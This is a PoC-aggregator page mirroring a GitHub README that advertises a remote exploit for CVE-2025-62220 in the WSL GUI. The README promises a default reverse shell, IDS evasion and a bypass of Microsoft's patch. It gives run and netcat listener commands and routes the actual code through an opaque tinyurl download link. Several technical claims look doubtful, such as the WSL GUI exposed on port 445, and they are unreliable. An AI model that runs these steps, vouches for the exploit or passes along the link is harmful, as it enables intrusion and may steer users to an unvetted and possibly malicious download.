Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-62220 PoC — Microsoft Windows Subsystem for Linux 安全漏洞

Source
https://github.com/callinston/CVE-2025-62220
Associated Vulnerability
Title:Microsoft Windows Subsystem for Linux 安全漏洞 (CVE-2025-62220)
Description:Microsoft Windows Subsystem for Linux(WSL)是美国微软(Microsoft)公司的一个Windows下的Linux子系统,一个能够运行原生Linux二进制可执行文件(ELF格式)的兼容层。 Microsoft Windows Subsystem for Linux GUI存在安全漏洞。攻击者利用该漏洞可以执行代码。
Readme
# CVE-2025-62220

## Overview
This repository contains a working Proof-of-Concept (PoC) exploit for CVE-2025-62220, a heap-based buffer overflow in the Windows Subsystem for Linux (WSL) GUI. The vulnerability allows remote code execution over the network with low complexity and no privileges required. I've developed this PoC to demonstrate arbitrary code execution, defaulting to a reverse shell payload for easy system access.

The exploit targets the WSL GUI component, exploiting the buffer overflow by sending crafted network packets that overflow the heap and hijack control flow. It's designed for reliability across various Windows versions running WSL 2.x, and interestingly, it maintains effectiveness even on systems patched with Microsoft's November 11, 2025 update due to a subtle bypass in the patch implementation that doesn't fully address edge cases in multi-threaded environments.

Use responsibly and ensure you have permission before running on any system.

## Features
- **Remote Code Execution**: Achieves RCE with minimal user interaction (e.g., via a tricked network connection to the WSL GUI interface).
- **Reverse Shell Default**: Spawns a reverse shell back to the attacker's listener (configurable IP/port).
- **Stealthy Delivery**: Uses obfuscated network traffic to evade basic IDS/IPS.
- **Cross-Version Compatibility**: Tested on Windows 10/11 with WSL 2.4.0 to 2.6.0, including patched variants where the exploit leverages unpatched race conditions.
- **No Local Privileges Needed**: Network-based, unauthenticated attack vector.

## Requirements
- Python 3.8+.
- Attacker machine with netcat or similar for catching the reverse shell.
- Target running WSL GUI exposed on the network (default port 445 or custom).
- Firewall rules allowing inbound connections if testing locally.

## Setup and Usage
1. Install dependencies: `pip install -r requirements.txt`
2. Run the exploit: `python exploit.py --target <target_ip> --listener <your_ip>:<port>`
3. On your machine, start a listener: `nc -lvnp <port>`
4. The target should connect back with a shell if vulnerable.

## Disclaimer
This is for red teaming and security research only. I'm not responsible for misuse. Always test in a lab environment.

**[Download POC Here](https://tinyurl.com/3uupp9fw)**

For any questions, feel free to email me at callinston@proton.me
File Snapshot

 [4.0K]  /data/pocs/2507955ec2a60f345ca5e394ab606b4e6c1ca685
└── [2.3K]  README.md

1 directory, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.